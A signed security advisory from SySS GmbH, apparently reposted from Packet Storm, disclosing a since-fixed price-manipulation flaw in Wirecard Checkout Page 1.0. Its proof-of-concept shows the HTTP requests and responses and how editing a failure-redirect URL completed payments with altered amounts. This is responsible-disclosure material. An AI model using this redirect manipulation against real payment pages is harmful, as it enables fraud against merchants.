Wirecard Checkout Page 1.0 Price Manipulation

2015-11-15T00:00:00
ID PACKETSTORM:134338
Type packetstorm
Reporter Martin Sturm
Modified 2015-11-15T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Advisory ID: SYSS-2015-061   
Product: Wirecard Checkout Page  
Manufacturer: Wirecard AG  
Affected Version(s): 1.0  
Tested Version(s): 1.0  
Vulnerability Type: Improper Validation of Integrity Check Value   
(CWE-354)  
Risk Level: High  
Solution Status: Fixed  
Manufacturer Notification: 2015-11-03  
Solution Date: 2015-11-03  
Public Disclosure: 2015-11-04  
CVE Reference: Not yet assigned  
Author of Advisory: Martin Sturm (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Wirecard Checkout Page is a payment page that supports different popular  
payment methods that can be integrated in online shops (see product Web   
site [1]).  
  
Due to an improper validation of an integrity check value it is possible  
to perform price manipulations in web shops using Wirecard Checkout  
Page.  
  
The vulnerability has already been fixed by the Wirecard AG by only  
granting access to the checkout page when a valid fingerprint is  
present.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
Details about an order are sent to a Wirecard server. This order data  
is protected by an integrity value named "fingerprint". If the   
transmitted data matches the fingerprint value, the server redirects the  
user to a checkout page via a URL in the HTTP Location header in the  
server response. Otherwise, if the order data is altered and the  
fingerprint does not match the transmitted data, the server redirects  
the user to a failure page.  
  
Due to an improper validation of the integrity check value  
"fingerprint", it is possible to access the checkout page and to   
successfully complete a transaction even if the corresponding order  
data was manipulated in a previous request and does not match the  
actual fingerprint. The Wirecard server reports the status of a successful  
transaction to the web shop of the vendor indicating that everything  
was in order.  
  
In this way, it is possible to perform price manipulations.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following HTTP POST request is sent to the PHP script  
checkout.wirecard.com/page/init.php:  
  
POST /page/init.php HTTP/1.1  
Host: checkout.wirecard.com  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1128  
  
customerId=CUSTOMERID&  
amount=AMOUNT&  
currency=CURRENCY&  
orderDescription=DESCRIPTION&  
orderReference=REFID&  
customerStatement=STATEMENT&  
successUrl=SUCCESSURL&  
failureUrl=FAILURL&  
cancelUrl=CANCELURL&  
serviceUrl=SERVICEURL&  
confirmUrl=CONFIRM&  
language=LANG&  
displayText=TESTTEXT&  
layout=desktop&  
requestFingerprintOrder=secret%2CcustomerId%2Clanguage%2Camount%2Ccurrency%2CorderDescription%2CsuccessUrl%2CconfirmUrl%2CorderReference%2CcustomerStatement%2CrequestFingerprintOrder&  
requestFingerprint=951b3a1acb90d2b62228b12a7bb66805&  
paymentType=SOFORTUEBERWEISUNG  
  
  
The transmitted data is secured by the fingerprint. Altering any of   
the parameters leads to a different fingerprint to be calculated on  
the receiving server. Changing the amount leads to the following  
failure response:  
  
HTTP/1.1 302 Found  
Date: Mon, 02 Nov 2015 10:56:25 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/failureintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3  
Content-Length: 0  
Content-Type: text/html; charset=UTF-8  
Connection: close  
  
  
Changing the location URL from "failureintermediate" to "select" prompts  
the Wirecard server to answer with the following response:  
  
HTTP/1.1 302 Found  
Date: Mon, 02 Nov 2015 10:57:03 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/sueintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3  
Content-Length: 0  
Content-Type: text/html; charset=UTF-8  
Connection: close  
  
  
This page allows to complete the transaction with the incorrect amount   
entered earlier.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The back end of Wirecard Checkout Page has been updated by the  
manufacturer and the reported vulnerability has been fixed.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-11-02: Vulnerability discovered  
2015-11-03: Vulnerability reported to manufacturer  
2015-11-03: Patch released by manufacturer  
2015-11-04: Public release of the security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product Web Site for Wirecard Checkout Page  
https://www.wirecard.com/products/payment/wirecard-checkout-page/  
[2] SySS Security Advisory SYSS-2015-061  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Martin Sturm of the SySS GmbH.  
  
E-Mail: martin.sturm@syss.de  
Public Key: https://syss.de/fileadmin/dokumente/Materialien/PGPKeys/Martin_Sturm.asc  
Key ID: FB58AC9B  
Key Fingerprint: EB18 CA7C BB12 9EAC 571F 15AE 2BDF 75C2 FB58 AC9B   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCAAGBQJWRetrAAoJECvfdcL7WKybYo4P/R/jYDVXoe32BJMgCcD+chPj  
xDznYcmBRa92YELPzx/2Y0QYUnII/CieSMiToo1PTtDboMETYu3QHzC+73xXUZ7n  
ML3BWLyJA8ufAKy0AIRSXZIK1X/9sS1+PuFHK97szbgL4UvqO42B2vmN/xKVdc6H  
rkz0S/2jyU15XUlR34130I6PiZLUO90GPMI5zSd7zeZadi3n6TdNT/e0zp0LS5lZ  
vLVT9zeByyyqRsjWFj+BbMvIh2mRLH6dJMMnjIAFZoapkF9WE6WHOG0Y/1hEHRMl  
Xt2QAxLp/94aAHvPkhyvEdka43ZZ80kWnvTqfQhwM/2xRjX/7V/ux9EOLSKvWna0  
fnyFSyyxiqOjNWXVSd3/920hBvjV1K2rVhQnf2OFNFVy2VnMLeb2mLxfefzm3QEe  
XncQZEy/P3xtqYcOkBdlY/ZyYOeO0T1gIjdNfHGEgWcFbQ202MKrQzdIyzKFC6Bf  
OvVI1XdMimKcuJ1FLaELod5CgRIyCZcjJMopnuX9Em7R2OIH2q8g+/Gp8JFtMDoS  
TEoA3cAdund7Z7PpRUK+rmVAtgcvEVz+upI3PX0w788WWRRGP97+sgp+WFSROxdI  
1JINczFP3hDBrjjcBEdWk5ZwpLPmBhjgv7zPgA1p7VhzG5j52De0kKhkEb2IEtkk  
kWF99x8Rr7r5+KcXwxg5  
=vQZ+  
-----END PGP SIGNATURE-----  
`